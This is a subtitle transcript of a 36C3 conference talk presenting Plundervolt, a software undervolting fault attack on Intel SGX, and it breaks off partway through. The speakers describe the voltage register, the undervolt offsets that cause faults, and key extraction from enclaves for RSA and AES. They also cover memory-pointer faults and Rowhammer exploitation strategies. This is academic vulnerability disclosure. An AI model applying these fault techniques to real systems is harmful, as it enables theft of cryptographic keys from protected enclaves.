Return to Video

36C3 - Plundervolt: Flipping Bits from Software without Rowhammer

  • 0:20 - 0:22
    36C3 preroll music
  • 0:22 - 0:25
    Herald Angel: OK. Welcome to our next
    talk. It's called flipping bits from
  • 0:25 - 0:30
    software without Row hammer, small
    reminder Row hammer used, still is a
  • 0:30 - 0:34
    software based fault attack. It was
    published in 2015. There were
  • 0:34 - 0:40
    countermeasures developed and we are still
    in the process of deploying these
  • 0:40 - 0:46
    everywhere. And now our two speakers are
    going to talk about a new software based
  • 0:46 - 0:56
    fault attack to execute commands inside
    the SGX environment. Our speakers,
  • 0:56 - 1:05
    Professor Daniel Gruss from the University
    of Graz and Kit Murdoch researching at the
  • 1:05 - 1:11
    University of Birmingham. The content of
    this talk is actually in her first
  • 1:11 - 1:17
    published paper published at IEEE, no
    accepted at IEEE Security and Privacy next
  • 1:17 - 1:21
    year. In case you do not come from the
    academic world, if this is your this is
  • 1:21 - 1:23
    always a big deal. If this is your first
    paper, it even more is, please welcome
  • 1:23 - 1:28
    them, both of you get a round of applause
    and enjoy the talk.
  • 1:28 - 1:31
    Applause
  • 1:31 - 1:38
    Kit Murdoch: Thank you. Hello. Let's get
    started. This is my favorite recent
  • 1:38 - 1:45
    attack. It's called Clockscrew. And the
    reason that it's my favorite is it created
  • 1:45 - 1:50
    a new class of fault attacks. Daniel
    Gruss: Fault attacks. I, I know that.
  • 1:50 - 1:54
    Fault attacks, you take these
    oscilloscopes and check the voltage line
  • 1:54 - 1:58
    and then you drop the voltage for a f....
    Kit: No, you see, this is why this one is
  • 1:58 - 2:05
    cool because you don't need any equipment
    at all. Adrian Tang. He created this
  • 2:05 - 2:10
    wonderful attack that uses DVFS. What is
    that?
  • 2:10 - 2:13
    Daniel: DVFS ? I don't know, don't
    violate format specifications.
  • 2:13 - 2:19
    Kit: I asked my boyfriend this morning
    what he thought DVFS stood for and he said
  • 2:19 - 2:22
    Darth Vader fights Skywalker.
    Laughter
  • 2:22 - 2:26
    Kit: I'm also wearing his t-shirt
    specially for him as well.
  • 2:26 - 2:30
    Daniel: Maybe, maybe this is more
    technical, maybe dazzling volt for
  • 2:30 - 2:35
    security like SGX.
    Kit: No, it's not that either. Mine was,
  • 2:35 - 2:40
    the one I came up this morning was: Drink
    vodka feel silly.
  • 2:40 - 2:43
    Laughter
    Kit: It's not that either. It stands for
  • 2:43 - 2:49
    dynamic voltage and frequency scaling. And
    what that means really simply is changing
  • 2:49 - 2:53
    the voltage and changing the frequency of
    your CPU. Why do you want to do this? Why
  • 2:53 - 2:58
    would anyone want to do this? Well, gamers
    want fast computers. I am sure there are a
  • 2:58 - 3:03
    few people out here who will want a really
    fast computer. Cloud Servers want high
  • 3:03 - 3:08
    assurance and low running costs. And what
    do you do if your hardware gets hot?
  • 3:08 - 3:13
    You're going to need to modify them. And
    actually finding a voltage and frequency
  • 3:13 - 3:18
    that work together is pretty difficult.
    And so what the manufacturers have done to
  • 3:18 - 3:23
    make this easier, is they've created a way
    to do this from software. They created
  • 3:23 - 3:29
    memory mapped registers. You modify this
    from software and it has an impact on the
  • 3:29 - 3:35
    hardware. And that's what this wonderful
    clockscrew attack did. But they found
  • 3:35 - 3:42
    something else out, which is you may have
    heard of: trust zone. Trust zone is in an
  • 3:42 - 3:48
    enclave in ARM chips that should be able
    to protect your data. But if you can
  • 3:48 - 3:52
    modify the frequency and voltage of the
    whole core, then you can modify it for
  • 3:52 - 3:59
    both trust zone and normal code. And this
    is their attack. In software they modified
  • 3:59 - 4:05
    the frequency to make it outside of the
    normal operating range. And they induced
  • 4:05 - 4:12
    faults. And so in an arm chip running on a
    mobile phone, they managed to get out an
  • 4:12 - 4:18
    AES key from within trust zone. They
    should not be able to do that. They were
  • 4:18 - 4:23
    able to trick trust zone into loading a
    self-signed app. You should not be able to
  • 4:23 - 4:32
    do that. That made this ARM attack really
    interesting. This year another attack came
  • 4:32 - 4:40
    out called volt jockey. This also attacked
    ARM chips. But instead of looking at
  • 4:40 - 4:49
    frequency on ARM chips, they were looking
    at voltage on ARM chips. We're thinking,
  • 4:49 - 4:57
    what about Intel?
    Daniel: OK, so Intel. Actually, I know
  • 4:57 - 5:02
    something about Intel because I had this
    nice laptop from HP. I really liked it,
  • 5:02 - 5:07
    but it had this problem that it was going
    too hot all the time and I couldn't even
  • 5:07 - 5:13
    work without it shutting down all the time
    because of the heat problem. So what I did
  • 5:13 - 5:18
    was I undervolted the CPU and actually
    this worked for me for several years. I
  • 5:18 - 5:22
    used this undervolted for several years.
    You can also see this, I just took this
  • 5:22 - 5:27
    from somewhere on the Internet and they
    compared with undervolting and without
  • 5:27 - 5:32
    undervolting. And you can see that the
    benchmark score improves by undervolting
  • 5:32 - 5:39
    because you don't run into the thermal
    throttling that often. So there are
  • 5:39 - 5:44
    different tools to do that. On Windows you
    could use RMClock, there's also
  • 5:44 - 5:48
    Throttlestop. On Linux there's the Linux-
    intel-undervolt GitHub repository.
  • 5:48 - 5:53
    Kit: And there's one more, actually.
    Adrian Tang, who I don't know if you know
  • 5:53 - 5:59
    a bit of a fan. He was the lead author on
    Clocks Screw. He wrote his PhD Thesis and
  • 5:59 - 6:03
    in the appendix he talked about
    undervolting on Intel machines and how you
  • 6:03 - 6:08
    do it. And I wish I'd read that before I
    started the paper. That would have saved
  • 6:08 - 6:12
    an awful lot of time. But thank you to the
    people on the Internet for making my life
  • 6:12 - 6:18
    a lot easier, because what we discovered
    was there is this magic module specific
  • 6:18 - 6:27
    register and it's called Hex 150. And this
    enables you to change the voltage the
  • 6:27 - 6:31
    people on the Internet did the work for
    me. So I know how it works. You first of
  • 6:31 - 6:37
    all tell it the plain RDX, what it is you
    want to, raise the voltage or lower the
  • 6:37 - 6:43
    voltage. We discovered that the core and
    the cache are on the same plane. So you
  • 6:43 - 6:47
    have to modify them both. But it has no
    effect, they're together. I guess in the
  • 6:47 - 6:51
    future they'll be separate. Then you
    modify the offset to say, I want to raise
  • 6:51 - 6:57
    it by this much or lower it by this much.
    So I thought, let's have a go. Let's write
  • 6:57 - 7:06
    a little bit of code. Here is the code.
    The smart people amongst you may have
  • 7:06 - 7:16
    noticed something. I suspect even my
    appalling C, even I would recognize that
  • 7:16 - 7:21
    that loop should never exit. I'm just
    multiplying the same thing again and again
  • 7:21 - 7:25
    and again and again and again and
    expecting it to exit. That shouldn't
  • 7:25 - 7:32
    happen. But let's look at what happened.
    So I'm gonna show you what I did. Oh..
  • 7:32 - 7:42
    There we go. So the first thing I'm gonna
    do is I'm going to set the frequency to be
  • 7:42 - 7:46
    one thing because I'm gonna play with
    voltage and if I'm gonna play with
  • 7:46 - 7:51
    voltage, I want the frequency to be
    set. So, It's quite easy using cpupower,
  • 7:51 - 7:57
    you set the maximum and the minimum to be
    1 gigahertz. And now my machine is running
  • 7:57 - 8:01
    at exactly 1 gigahertz. Now we'll look at
    the bit of code that you need to
  • 8:01 - 8:05
    undervolt, again I didn't do the work,
    thank you to the people on the internet
  • 8:05 - 8:12
    for doing this. You put the MSR into the
    kernel and let's have a look at the code.
  • 8:12 - 8:21
    Does that look right? Oh, it does, looks
    much better up there. Yes, it's that one
  • 8:21 - 8:27
    line of code. That is the one line of code
    you need to open and then we're going to
  • 8:27 - 8:33
    write to it. And again, oh why is it doing
    that? We have a touch sensitive screen
  • 8:33 - 8:53
    here. Might touch it again. That's the
    line of code that's gonna open it and
  • 8:53 - 8:56
    that's how you write to it. And again, the
    people on the Internet did the work for me
  • 8:56 - 8:59
    and told me how I had to write that. So
    what I can do here is I'm just going to
  • 8:59 - 9:04
    undervolt and I'm gonna undervolt,
    multiplying deadbeef by this really big
  • 9:04 - 9:09
    number. I'm starting at minus two hundred
    and fifty two millivolts. And we're just
  • 9:09 - 9:11
    going to see if I ever get out of this
    loop.
  • 9:11 - 9:14
    Daniel: But surely the system would just
    crash, right?
  • 9:14 - 9:22
    Kit: You'd hope so, wouldn't you? Let's
    see, there we go! We got a fault. I was a
  • 9:22 - 9:25
    bit gobsmacked when that happened because
    the system didn't crash.
  • 9:25 - 9:30
    Daniel: So that doesn't look too good. So
    the question now is, what is the... So you
  • 9:30 - 9:33
    show some voltage here, some undervolting.
    Kit: Yeah
  • 9:33 - 9:37
    Daniel: What undervolting is actually
    required to get a bit flip?
  • 9:37 - 9:41
    Kit: We did a lot of tests. We didn't just
    multiply by deadbeef. We also multiplied
  • 9:41 - 9:45
    by random numbers. So here I'm going to
    just generate two random numbers. One is
  • 9:45 - 9:50
    going up to f f f f f f one is going up to
    ff. I'm just going to try different, again
  • 9:50 - 9:57
    I'm going to try undervolting to see if I
    get different bit flips. And again, I got
  • 9:57 - 10:04
    the same bit flipped, so I'm getting the
    same one single bit flip there. Okay, so
  • 10:04 - 10:08
    maybe it's only ever going to be one bit
    flip. Ah, I got a different bit flip and
  • 10:08 - 10:12
    again a different bit flip and it's,
    you'll notice they always appear to be
  • 10:12 - 10:17
    bits together next to one another. So to
    answer Daniel's question, I pressed my
  • 10:17 - 10:23
    machine a lot in the process of doing
    this, but I wanted to know what were good
  • 10:23 - 10:29
    values to undervolt at. And here they are.
    We tried for all the frequencies. We tried
  • 10:29 - 10:33
    what was the base voltage? And then when
    was the point at which we got the first
  • 10:33 - 10:38
    fault? And once we'd done that, it made
    everything really easy. We just made sure
  • 10:38 - 10:41
    we didn't go under that and ended up with
    a kernel panic or the machine crashing.
  • 10:41 - 10:47
    Daniel: So this is already great. I think
    this looks like it is exploitable and the
  • 10:47 - 10:54
    first thing that you need when you are
    working on a vulnerability is the name and
  • 10:54 - 11:01
    the logo and maybe a Website. Everything
    like that. And real people on the Internet
  • 11:01 - 11:06
    agree with me. Like this tweet.
    Laughter
  • 11:06 - 11:12
    Daniel: Yes. So we need a name and a logo.
    Kit: No, no, we don't need it. Come on.
  • 11:12 - 11:15
    then. Go on then. What is your idea?
    Daniel: So I thought this is like, it's
  • 11:15 - 11:21
    like Row hammer. We are flipping bits, but
    with voltage. So I called it Volt hammer
  • 11:21 - 11:25
    and I already have a logo for it.
    Kit: We're not, we're not giving it a
  • 11:25 - 11:28
    logo.
    Daniel: No, I think we need a logo because
  • 11:28 - 11:35
    people can relate more to the images
    there, to the logo that we have. Reading a
  • 11:35 - 11:39
    word is much more complicated than seeing
    a logo somewhere. It's better for
  • 11:39 - 11:45
    communication. You make it easier to talk
    about your vulnerability. Yeah? And the
  • 11:45 - 11:50
    name, same thing. How, how would you like
    to call it? Like undervolting on Intel to
  • 11:50 - 11:54
    induce flips in multiplications to then
    run an exploit? No, that's not a good
  • 11:54 - 12:02
    vulnerability name. And speaking of the
    name, if we choose a fancy name, we might
  • 12:02 - 12:06
    even make it into TV shows like Row
    hammer.
  • 12:06 - 12:12
    Video Clip 1A: The hacker used a DRAM Row
    hammer exploit to gain kernel privileges.
  • 12:12 - 12:15
    Video Clip 1B: HQ, yeah we've got
    something.
  • 12:15 - 12:21
    Daniel: So this was in designated Survivor
    in March 2018 and this guy just got shot.
  • 12:21 - 12:26
    So hopefully we won't get shot but
    actually we have also been working. So my
  • 12:26 - 12:33
    group has been working on Row hammer and
    presented this in 2015 here at CCC, in
  • 12:33 - 12:38
    Hamburg back then. It was Row hammer JS
    and we called it root privileges for web
  • 12:38 - 12:41
    apps because we showed that you can do
    this from JavaScript in a browser. Looks
  • 12:41 - 12:44
    pretty much like this, we hammered the
    memory a bit and then we see a bit flips
  • 12:44 - 12:50
    in the memory. So how does this work?
    Because maybe for another fault attack,
  • 12:50 - 12:53
    software based fault attack, the only
    other software based fault attack that we
  • 12:53 - 12:59
    know. So, these are related to DFS and
    this is a different effect. So what do we
  • 12:59 - 13:04
    do here is we look at the DRAM and the
    DRAM is organized in multiple rows and we
  • 13:04 - 13:10
    will access these rows. These rows consist
    of so-called cells, which are capacitors
  • 13:10 - 13:14
    and transistors each. And they store one
    bit of information each. And the row
  • 13:14 - 13:18
    buffer, the row size usually is something
    like eight kilobytes. And then when you
  • 13:18 - 13:22
    read something, you copy it to the row
    buffer. So it works pretty much like this:
  • 13:22 - 13:26
    You read from a row, you copy it to the
    row buffer. The problem now is, these
  • 13:26 - 13:31
    capacitors leak over time so you need to
    refresh them frequently. And they have
  • 13:31 - 13:38
    also a maximum refresh interval defined in
    a standard to guarantee data integrity.
  • 13:38 - 13:43
    Now the problem is that cells leak fast
    upon proximate accesses, and that means if
  • 13:43 - 13:49
    you access two locations in proximity to a
    third location, then the third location
  • 13:49 - 13:54
    might flip a bit without accessing it. And
    this has been exploited in different
  • 13:54 - 13:59
    exploits. So the usual strategies is
    maybe, maybe we can use some of them. So
  • 13:59 - 14:03
    the usual strategies here are searching
    for a page with a bit flip. So you search
  • 14:03 - 14:08
    for it and then you find some. Ah, There
    is a flip here. Then you release the page
  • 14:08 - 14:13
    with the flip in the next step. Now this
    memory is free and now you allocate a lot
  • 14:13 - 14:18
    of target pages, for instance, page
    tables, and then you hope that the target
  • 14:18 - 14:22
    page is placed there. If it's a page
    table, for instance, like this and you
  • 14:22 - 14:27
    induce a bit flip. So before it was
    pointing to User page, then it was
  • 14:27 - 14:33
    pointing to no page at all because we
    maybe unmapped it. And the page that we
  • 14:33 - 14:38
    use the bit flip now is actually the one
    storing all of the PTEs here. So the one
  • 14:38 - 14:43
    in the middle is stored down there. And
    this one now has a bit flip and then our
  • 14:43 - 14:50
    pointer to our own user page changes due
    to the big flip and points to hopefully
  • 14:50 - 14:55
    another page table because we filled that
    memory with page tables. Another direction
  • 14:55 - 15:02
    that we could go here is flipping bits in
    code. For instance, if you think about a
  • 15:02 - 15:07
    password comparison, you might have a jump
    equal check here and the jump equal check
  • 15:07 - 15:13
    if you flip one bit, it transforms into a
    different instruction. And fortunately, oh
  • 15:13 - 15:18
    this already looks interesting. Ah,
    Perfect. Changing the password check nto a
  • 15:18 - 15:26
    password incorrect check. I will always be
    root. And yeah, that's basically it. So
  • 15:26 - 15:31
    these are two directions that we might
    look at for Row hammer. That's also maybe
  • 15:31 - 15:35
    a question for Row hammer, why would we
    even care about other fault attacks?
  • 15:35 - 15:40
    Because Row hammer works on DDR 3, it
    works on DDR 4, it works on ECC memory.
  • 15:40 - 15:48
    Kit: Does it, how does it deal with SGX?
    Daniel: Ahh yeah, yeah SGX. Ehh, yes. So
  • 15:48 - 15:51
    maybe we should first explain what SGX is.
    Kit: Yeah, go for it.
  • 15:51 - 15:57
    Daniel: SGX is a so-called TEE trusted
    execution environment on Intel processors
  • 15:57 - 16:02
    and Intel designed it this way that you
    have an untrusted part and this runs on
  • 16:02 - 16:06
    top of an operating system, inside an
    application. And inside the application
  • 16:06 - 16:11
    you can now create an enclave and the
    enclave runs in a trusted part, which is
  • 16:11 - 16:17
    supported by the hardware. The hardware is
    the trust anchor for this trusted enclave
  • 16:17 - 16:20
    and the enclave, now you can from the
    untrusted part, you can call into the
  • 16:20 - 16:25
    enclave via a Callgate pretty much like a
    system call. And in there you execute a
  • 16:25 - 16:32
    trusted function. Then you return to this
    untrusted part and then you can continue
  • 16:32 - 16:35
    doing other stuff. And the operating
    system has no direct access to this
  • 16:35 - 16:40
    trusted part. This is also protected
    against all kinds of other attacks. For
  • 16:40 - 16:44
    instance, physical attacks. If you look at
    the memory that it uses, maybe I have 16
  • 16:44 - 16:50
    gigabytes of RAM. Then there is a small
    region for the EPC, the enclave page
  • 16:50 - 16:55
    cache, the memory that enclaves use and
    it's encrypted and integrity protected and
  • 16:55 - 17:00
    I can't tamper with it. So for instance,
    if I want to mount a cold boot attack,
  • 17:00 - 17:04
    pull out the DRAM, put it in another
    machine and read out what content it has.
  • 17:04 - 17:08
    I can't do that because it's encrypted.
    And I don't have the key. The key is in
  • 17:08 - 17:15
    the processor quite bad. So, what happens
    if we have bit flips in the EPC? Good
  • 17:15 - 17:22
    question. We tried that. The integrity
    check fails. It locks up the memory
  • 17:22 - 17:27
    controller, which means no further memory
    accesses whatsoever run through this
  • 17:27 - 17:34
    system. Everything stays where it is and
    the system halts basically. It's no
  • 17:34 - 17:41
    exploit, it's just denial of service.
    Kit: Huh. So maybe SGX can save us. So
  • 17:41 - 17:47
    what I want to know is, Row Hammer clearly
    failed because of the integrity check. Is
  • 17:47 - 17:52
    my attack where I can flip bits. Is this
    gonna work inside SGX?
  • 17:52 - 17:55
    Daniel: I don't think so because they
    have integrity protection, right?
  • 17:55 - 18:00
    Kit: So what I'm gonna do is run the same
    thing in the right hand side is user
  • 18:00 - 18:04
    space. In the left hand side is the
    enclave. As you can see, I'm running at
  • 18:04 - 18:12
    minus 261 millivolts. No error minus 262.
    No error minus 2... fingers crossed we
  • 18:12 - 18:21
    don't get a kernel panic. Do you see that
    thing at the bottom? That's a bit flip
  • 18:21 - 18:25
    inside the enclave. Oh, yeah.
    Daniel: That's bad.
  • 18:25 - 18:30
    Applause
    Kit: Thank you. Yeah and it's the same
  • 18:30 - 18:34
    bit flip that I was getting in user space
    , that is also really interesting.
  • 18:34 - 18:38
    Daniel: I have an idea. So, it's
    surprising that it works right. But I have
  • 18:38 - 18:45
    an idea. This is basically doing the same
    thing as clocks group. But on SGX, right?
  • 18:45 - 18:47
    Kit: Yeah.
    Daniel: And I thought maybe you didn't
  • 18:47 - 18:52
    like the previous logo, maybe it was just
    too much. So I came up with something more
  • 18:52 - 18:53
    simple...
    Kit: You've come up with a new... He's
  • 18:53 - 18:56
    come up with a new name.
    Daniel: Yes, SGX Screw. How do you like
  • 18:56 - 18:59
    it?
    Kit: No, we don't even have an attack. We
  • 18:59 - 19:02
    can't have a logo before we have an
    attack.
  • 19:02 - 19:07
    Daniel: The logo is important, right? I
    mean, how would you present this on a
  • 19:07 - 19:09
    website
    without a logo?
  • 19:09 - 19:12
    Kit: Well, first of all, I need an attack.
    What am I going to attack with this?
  • 19:12 - 19:15
    Daniel: I have an idea what we could
    attack. So, for instance, we could attack
  • 19:15 - 19:22
    crypto, RSA. RSA is a crypto algorithm.
    It's a public key crypto algorithm. And
  • 19:22 - 19:28
    you can encrypt or sign messages. You can
    send this over an untrusted channel. And
  • 19:28 - 19:36
    then you can also verify. So this is
    actually a typo which should be decrypt...
  • 19:36 - 19:43
    there, encrypt verifying messages with a
    public key or decrypt sign messages with a
  • 19:43 - 19:54
    private key. So how does this work? Yeah,
    basically it's based on exponention modulo a
  • 19:54 - 20:01
    number and this number is computed from
    two prime numbers. So you, for the
  • 20:01 - 20:09
    signature part, which is similar to the
    decryption basically, you take the hash of
  • 20:09 - 20:18
    the message and then take it to the power
    of d modulo n, the public modulus, and
  • 20:18 - 20:26
    then you have the signature and everyone
    can verify that this is actually, later on
  • 20:26 - 20:34
    can verify this because the exponent part
    is public. So n is also public so we can
  • 20:34 - 20:40
    later on do this. Now there is one
    optimization which is quite nice, which is
  • 20:40 - 20:45
    Chinese remainder theorem. And this part
    is really expensive. It takes a long time.
  • 20:45 - 20:51
    So it's a lot faster, if you split this in
    multiple parts. For instance, if you split
  • 20:51 - 20:56
    it in two parts, you do two of those
    exponentations, but with different
  • 20:56 - 21:02
    numbers, with smaller numbers and then it's
    cheaper. It takes fewer rounds. And if you
  • 21:02 - 21:07
    do that, you of course have to adapt the
    formula up here to compute the signature
  • 21:07 - 21:13
    because, you now put it together out of
    the two pieces of the signature that you
  • 21:13 - 21:19
    compute. OK, so this looks quite
    complicated, but the point is we want to
  • 21:19 - 21:27
    mount a fault attack on this. So what
    happens if we fault this? Let's assume we
  • 21:27 - 21:36
    have two signatures which are not
    identical. Right, S and S', and we
  • 21:36 - 21:41
    basically only need to know that in one of
    them, a fault occurred. So the first is
  • 21:41 - 21:45
    something, the other is something else. We
    don't care. But what you see here is that
  • 21:45 - 21:52
    both are multiplied by Q plus s2. And if
    you subtract one from the other, what do
  • 21:52 - 21:57
    you get? You get something multiplied with
    Q. There is something else that is
  • 21:57 - 22:03
    multiplied with Q, which is P and n is
    public. So what we can do now is we can
  • 22:03 - 22:10
    compute the greatest common divisor of
    this and n and get q.
  • 22:10 - 22:15
    Kit: Okay. So I'm interested to see if...
    I didn't understand a word of that, but
  • 22:15 - 22:20
    I'm interested to see if I can use this to
    mount an attack. So how am I going to do
  • 22:20 - 22:26
    this? Well, I'll write a little RSA
    decrypt program and what I'll do is I use
  • 22:26 - 22:32
    the same bit of multiplication that I've
    been using before. And when I get a bit
  • 22:32 - 22:39
    flip, then I'll do the decryption. All
    this is happening inside SGX, inside the
  • 22:39 - 22:44
    enclave. So let's have a look at this.
    First of all, I'll show you the code that
  • 22:44 - 22:52
    I wrote, again copied from the Internet.
    Thank you. So there it is, I'm going to
  • 22:52 - 22:56
    trigger the fault.I'm going to wait for
    the triggered fault, then I'm going to do
  • 22:56 - 23:01
    a decryption. Well, let's have a quick
    look at the code, which should be exactly
  • 23:01 - 23:05
    the same as it was right at the very
    beginning when we started this. Yeah.
  • 23:05 - 23:10
    There's my deadbeef written slightly
    differently. But there is my deadbeef. So,
  • 23:10 - 23:14
    now this is ever so slightly messy on the
    screen, but I hope you're going to see
  • 23:14 - 23:23
    this. So minus 239. Fine. Still fine.
    Still fine. I'll just pause there. You can
  • 23:23 - 23:27
    see at the bottom I've written meh - all
    fine., If you're wondering. So what we're
  • 23:27 - 23:33
    looking at here is a correct decryption
    and you can see inside the enclave, I'm
  • 23:33 - 23:38
    initializing p and I'm initializing q. And
    those are part of the private key. I
  • 23:38 - 23:44
    shouldn't be able to get those. So 239
    isn't really working. Let's try going up
  • 23:44 - 23:49
    to minus 240. Oh oh oh oh! RSA error, RSA
    error. Exciting!
  • 23:49 - 23:52
    Daniel: Okay, So this should work for the
    attack then.
  • 23:52 - 23:57
    Kit: So let's have a look, again. I copied
    somebodys attack on the Internet where
  • 23:57 - 24:04
    they very kindly, It's called the lenstra
    attack. And again, I got I got an output.
  • 24:04 - 24:08
    I don't know what it is because I didn't
    understand any of that crypto stuff.
  • 24:08 - 24:10
    Daniel: Me neither.
    Kit: But let me have a look at the source
  • 24:10 - 24:16
    code and see if that exists anywhere in
    the source code inside the enclave. It
  • 24:16 - 24:22
    does. I found p. And if I found p, I can
    find q. So just to summarise what I've
  • 24:22 - 24:32
    done, from a bit flip I have got the
    private key out of the SGX enclave and I
  • 24:32 - 24:36
    shouldn't be able to do that.
    Daniel: Yes, yes and I think I have an
  • 24:36 - 24:40
    idea. So you didn't like the previous...
    Kit: Ohh, I know where this is going. Yes.
  • 24:40 - 24:46
    Daniel: ...didn't like the previous name.
    So I came up with something more cute and
  • 24:46 - 24:53
    relatable, maybe. So I thought, this is an
    attack on RSA. So I called it Mufarsa.
  • 24:53 - 24:58
    Laughter
    Daniel: My Undervolting Fault Attack On
  • 24:58 - 25:00
    RSA.
    Kit: That's not even a logo. That's just a
  • 25:00 - 25:02
    picture of a lion.
    Daniel: Yeah, yeah it's, it's sort of...
  • 25:02 - 25:05
    Kit: Disney are not going to let us use
    that.
  • 25:05 - 25:07
    Laughter
    Kit: Well it's not, is it Star Wars? No,
  • 25:07 - 25:11
    I don't know. OK. OK, so Daniel, I really
    enjoyed it.
  • 25:11 - 25:14
    Daniel: I don't think you will like any of
    the names I suggest.
  • 25:14 - 25:18
    Kit: Probably not. But I really enjoyed
    breaking RSA. So what I want to know is
  • 25:18 - 25:19
    what else can I break?
    Daniel: Well...
  • 25:19 - 25:23
    Kit: Give me something else I can break.
    Daniel: If you don't like the RSA part, we
  • 25:23 - 25:28
    can also take other crypto. I mean there
    is AES for instance, AES is a symmetric
  • 25:28 - 25:34
    key crypto algorithm. Again, you encrypt
    messages, you transfer them over a public
  • 25:34 - 25:40
    channel, this time with both sides having
    the key. You can also use that for
  • 25:40 - 25:48
    storage. AES internally uses a 4x4 state
    matrix for 4x4 bytes and it runs through
  • 25:48 - 25:54
    ten rounds which are S-box, which
    basically replaces a byte by another byte,
  • 25:54 - 25:59
    some shifting of rows in this matrix, some
    mixing of the columns, and then the round
  • 25:59 - 26:03
    keys is added which is computed from the
    AES key that you provided to the
  • 26:03 - 26:09
    algorithm. And if we look at the last
    three rounds because we want to, again,
  • 26:09 - 26:12
    mount a fault attack, and there are
    different differential fault attacks on
  • 26:12 - 26:18
    AES. If you look at the last rounds,
    because the way of this algorithm works is
  • 26:18 - 26:23
    it propagates, changes, differences
    through this algorithm. If you'd look at
  • 26:23 - 26:28
    the state matrix, which only has a
    difference in the top left corner, then
  • 26:28 - 26:34
    this is how the state will propagate
    through the 9th and 10th round. And you
  • 26:34 - 26:42
    can put up formulas to compute possible
    values for the state up there. If you have
  • 26:42 - 26:48
    different, if you have encryption, which
    only have a difference there in exactly
  • 26:48 - 26:57
    that single state byte. Now, how does this
    work in practice? Well, today everyone is
  • 26:57 - 27:02
    using AES-NI because that's super fast.
    That's, again, an instruction set
  • 27:02 - 27:08
    extension by Intel and it's super fast.
    Kit: Oh okay, I want to have a go. Right,
  • 27:08 - 27:12
    so let me have a look if I can break some
    of these AES-NI instructions. So I'm to
  • 27:12 - 27:16
    come at this slightly differently. Last
    time I waited for a multiplication fault,
  • 27:16 - 27:20
    I'm going to do something slightly
    different. What I'm going to do is put in
  • 27:20 - 27:27
    a loop two AES encryptions. And I wrote
    this using Intel's code, I should say I we
  • 27:27 - 27:33
    wrote this using Intel's code, example
    code. This should never fault. And we know
  • 27:33 - 27:37
    what we're looking for. What we're looking
    for is a fault in the eighth round. So
  • 27:37 - 27:42
    let's see if we get faults with this. So
    the first thing is I'm going to start at
  • 27:42 - 27:48
    minus 262 millivolt. What's interesting is
    that you have to undervolt more when it's
  • 27:48 - 27:57
    cold so you can tell at what time of day I
    ran these. Oh I got a fault, I got a fault.
  • 27:57 - 28:02
    Well, unfortunately. Where did that?
    That's actually in the fourth round. I'm
  • 28:02 - 28:04
    I'm obviously, eh fifth round, okay.
    Daniel: You can't do anything with that.
  • 28:04 - 28:10
    Kit: You can't do anything, again in the
    fifth round. Can't do anything with that,
  • 28:10 - 28:15
    fifth round again. Oh! Oh we got one. We
    got one in the eighth round. And so it
  • 28:15 - 28:21
    means I can take these two ciphertext and
    I can use the differential fault attack. I
  • 28:21 - 28:27
    actually ran this twice in order to get
    two pairs of faulty output because it made
  • 28:27 - 28:31
    it so much easier. And again, thank you to
    somebody on the Internet for having
  • 28:31 - 28:35
    written a differential fault analysis
    attack for me. You don't, you don't need
  • 28:35 - 28:39
    two, but it just makes it easy for the
    presentation. So I'm now going to compare.
  • 28:39 - 28:45
    Let me just pause that a second, I used
    somebody else's differential fault attack
  • 28:45 - 28:50
    and it gave me in one, for the first pair
    it gave me 500 possible keys and for the
  • 28:50 - 28:54
    second it gave me 200 possible keys. I'm
    overlapping them. And there was only one
  • 28:54 - 29:00
    key that matched both. And that's the key
    that came out. And let's just again check
  • 29:00 - 29:06
    inside the source code, does that key
    exist? What is the key? And yeah, that is
  • 29:06 - 29:10
    the key. So, again what I've...
    Daniel: That is not a very good key,
  • 29:10 - 29:14
    though.
    Kit: No, Ehhh... I think, if you think
  • 29:14 - 29:18
    about randomness, it's as good as any
    other. Anyway, ehhh...
  • 29:18 - 29:21
    Laughter
    Kit: What have I done? I have flipped a
  • 29:21 - 29:29
    bit inside SGX to create a fault in AES
    New Instruction set that has enabled me to
  • 29:29 - 29:34
    get the AES key out of SGX. You shouldn't
    be able to do that.
  • 29:34 - 29:40
    Daniel: So. So now that we have multiple
    attacks, we should think about a logo and
  • 29:40 - 29:43
    a name, right?
    Kit: This one better be good because the
  • 29:43 - 29:47
    other one wasn't very good.
    Daniel: No, seriously, we are already
  • 29:47 - 29:48
    soon...
    Kit: Okay.
  • 29:48 - 29:51
    Daniel: We are, we will write this out.
    Send this to a conference. People will
  • 29:51 - 29:57
    like it, right. This is and I already have
    a name and a logo for it. Kit: Come on
  • 29:57 - 29:59
    then.
    Daniel: Crypto Vault Screw Hammer.
  • 29:59 - 30:03
    Laughter
    Daniel: It's like, we attack crypto in a
  • 30:03 - 30:07
    vault, SGX, and it's like a, like the
    Clock screw and like Row hammer. And
  • 30:07 - 30:12
    like...
    Kit: I don't think that's very catchy. But
  • 30:12 - 30:20
    let me tell you, it's not just crypto. So
    we're faulting multiplication. So surely
  • 30:20 - 30:24
    there's another use for this other than
    crypto. And this is where something really
  • 30:24 - 30:28
    interesting happens. For those of you who
    are really good at C you can come and
  • 30:28 - 30:34
    explain this to me later. This is a really
    simple bit of C. All I'm doing is getting
  • 30:34 - 30:39
    an offset of an array and taking the
    address of that and putting it into a
  • 30:39 - 30:44
    pointer. Why is this interesting? Hmmm,
    It's interesting because I want to know
  • 30:44 - 30:48
    what the compiler does with that. So I am
    going to wave my magic wand and what the
  • 30:48 - 30:53
    compiler is going to do is it's going to
    make this. Why is that interesting?
  • 30:53 - 30:58
    Daniel: Simple pointer arithmetic?
    Kit: Hmmm. Well. we know that we can fault
  • 30:58 - 31:02
    multiplications. So we're no longer
    looking at crypto. We're now looking at
  • 31:02 - 31:09
    just memory. So let's see if I can use
    this as an attack. So let me try and
  • 31:09 - 31:13
    explain what's going on here. On the right
    hand side, you can see the undervolting.
  • 31:13 - 31:16
    I'm going to create an enclave and I've
    put it in debug mode so that I can see
  • 31:16 - 31:20
    what's going on. You can see the size of
    the enclave because we've got the base and
  • 31:20 - 31:29
    the limit of it. And if we look at that in
    a diagram, what that's saying is here. If
  • 31:29 - 31:35
    I can write anything at the top above
    that, that will no longer be encrypted,
  • 31:35 - 31:42
    that will be unencrypted. Okay, let's
    carry on with that. So, let's just write
  • 31:42 - 31:46
    that one statement again and again, that
    pointer arithmetic again and again and
  • 31:46 - 31:53
    again whilst I'm undervolting and see what
    happens. Oh, suddenly it changed and if
  • 31:53 - 31:58
    you look at where it's mapped it to, it
    has mapped that pointer to memory that is
  • 31:58 - 32:06
    no longer inside SGX, it has put it into
    untrusted memory. So we're just doing the
  • 32:06 - 32:10
    same statement again and again whilst
